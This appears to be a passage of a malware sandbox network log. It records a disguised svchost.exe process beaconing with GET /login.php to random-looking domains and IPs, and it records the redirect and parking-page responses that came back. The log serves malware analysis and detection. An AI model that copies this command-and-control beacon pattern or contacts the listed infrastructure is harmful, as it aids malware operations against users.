                                                                                                                                                                                                              Nov 11, 2024 18:33:13.859889030 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                              Server: openresty/1.15.8.1
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:13 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 151
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.694252968 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.964091063 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                              Server: openresty/1.15.8.1
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:14 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 151
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.198591948 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.498912096 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                              Server: openresty/1.15.8.1
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:38 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 151
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                              Nov 11, 2024 18:33:39.095477104 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:39.381103992 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                              Server: openresty/1.15.8.1
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:39 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 151
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              19192.168.2.849730106.15.232.16380007652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.876764059 CET290OUTGET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: 106.15.232.163:8000
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.693023920 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:14 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.979581118 CET290OUTGET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: 106.15.232.163:8000
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.260277987 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:15 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.789968967 CET290OUTGET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: 106.15.232.163:8000
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 11, 2024 18:33:39.067097902 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:38 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Nov 11, 2024 18:33:39.393409967 CET290OUTGET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: 106.15.232.163:8000
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 11, 2024 18:33:39.669028044 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:39 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              20192.168.2.84973276.223.67.189807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.191246986 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qexyhuv.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.619551897 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:19 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 114
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              21192.168.2.84973364.225.91.73807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.251180887 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: galynuh.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.802555084 CET816INHTTP/1.1 200 OK
                                                                                                                                                                                                              server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:19 GMT
                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                              content-length: 593
                                                                                                                                                                                                              last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                              etag: "63f68860-251"
                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              22192.168.2.849734103.224.182.252807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.493175983 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vofycot.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.052227974 CET338INHTTP/1.1 302 Found
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:19 GMT
                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                              set-cookie: __tad=1731346399.8350699; expires=Thu, 09-Nov-2034 17:33:19 GMT; Max-Age=315360000
                                                                                                                                                                                                              location: http://ww16.vofycot.com/login.php?sub1=20241112-0433-1952-9852-0a12b0cc4551
                                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              Data Raw: 0a 0a
                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              23192.168.2.849735103.224.212.210807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.494313955 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyxynyx.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.062897921 CET340INHTTP/1.1 302 Found
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:19 GMT
                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                              set-cookie: __tad=1731346399.2937263; expires=Thu, 09-Nov-2034 17:33:19 GMT; Max-Age=315360000
                                                                                                                                                                                                              location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0433-1952-8ae5-52e851fd8a3a
                                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              Data Raw: 0a 0a
                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              24192.168.2.849736154.85.183.50807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.581151009 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyval.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.393579960 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:20 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 138
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              ETag: "663ee226-8a"
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.395010948 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyval.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.680514097 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:20 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 138
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              ETag: "663ee226-8a"
